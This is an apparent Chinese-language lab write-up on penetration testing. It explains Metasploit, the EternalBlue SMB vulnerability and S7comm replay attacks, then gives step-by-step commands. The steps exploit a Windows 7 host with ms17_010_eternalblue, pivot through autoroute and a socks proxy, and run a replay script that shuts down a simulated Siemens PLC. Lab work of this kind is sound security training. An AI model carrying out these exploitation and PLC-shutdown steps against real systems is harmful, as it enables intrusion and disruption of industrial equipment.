一、背景知识
1.1、Metasploit Framework(MSF)
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。
渗透测试:Metasploit 提供了一套完整的工具和模块,可用于对各种系统和应用程序进行渗透测试。
检测漏洞:Metasploit 包含一个广泛的预配置和引导漏洞模块库,可以扫描网络、指纹系统并收集有关潜在漏洞的信息。
开发漏洞:Metasploit为用户提供了强大的脚本语言,允许他们构建和连接他们的漏洞利用;
测试和评估安全控制:Metasploit 可以评估多种安全系统的功效,例如防火墙、入侵检测系统和防病毒软件。
1.2、永恒之蓝漏洞
一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
1.3、s7 common协议重放攻击(适用于S7-300、S7-400、S7-1200)
重放攻击(Replay Attacks)又称重播攻击、回放攻击,是指攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程,破坏认证的正确性。
TCP三次握手
COTP握手:COTP部分分为两种:COTP连接包和COTP功能包,COTP握手阶段使用的是COTP连接包,S7数据传输阶段使用的是COTP功能包。
S7COMM建联:S7COMM作为COTP的有效载荷,主要包含三部分:Header、Parameter、Data,建联阶段S7COMM只包含Header和Parameter两个字段。
前置
二、实验步骤
步骤1:打开MSF
Kali打开命令行,ctrl+alt+t
命令行输入:msfconsole
步骤2:利用win7的永恒之蓝漏洞
输入命令:
exploit/windows/smb/ms17_010_eternalblue
这里说的是是否使用这个漏洞,输入Y即可。
展示漏洞设置参数:show options
这里的LHOST不对,使用set LOHOST修改
set LHOST 192.168.3.163
步骤3:设置参数
set rhosts 192.168.3.162 exploit
步骤4:进入win7 cmd
查看主机网络情况
步骤5:设置静态路由
run autoroute -s 10.0.0.1/24 设置静态路由
run autoroute -p 查看是否成功
background 保存该会话且返回msf
步骤6:开启MSF的socks代理
use auxiliary/server/socks_proxy 进入该模块
set srvhost 127.0.0.1 set version 4a set srvport 1888 完成设置之后输入exploit
步骤7:修改proxychains配置文件
在Kali机上打开新的命令行
输入
sudo vim /c/proxychains4.conf
编辑配置文件
在最后一行添加 socks4 127.0.0.1 1888
保存并退出:esc shift+: wq(输入)+enter
步骤8:发起重放攻击
在桌面右键打开命令行并输入:proxychains4 python2 s7200_PLC.py 2
这里要进入文件夹Desktop下输入改命令
步骤9:查看攻击情况
win7上的西门子被关闭
这里我在做完kali机上的配置之后才发现win7上的plc并未开启,所以这是在最后才打开的plc模拟器,最后再执行
proxychains4 python2 s7200_PLC.py 2
最后plc被关闭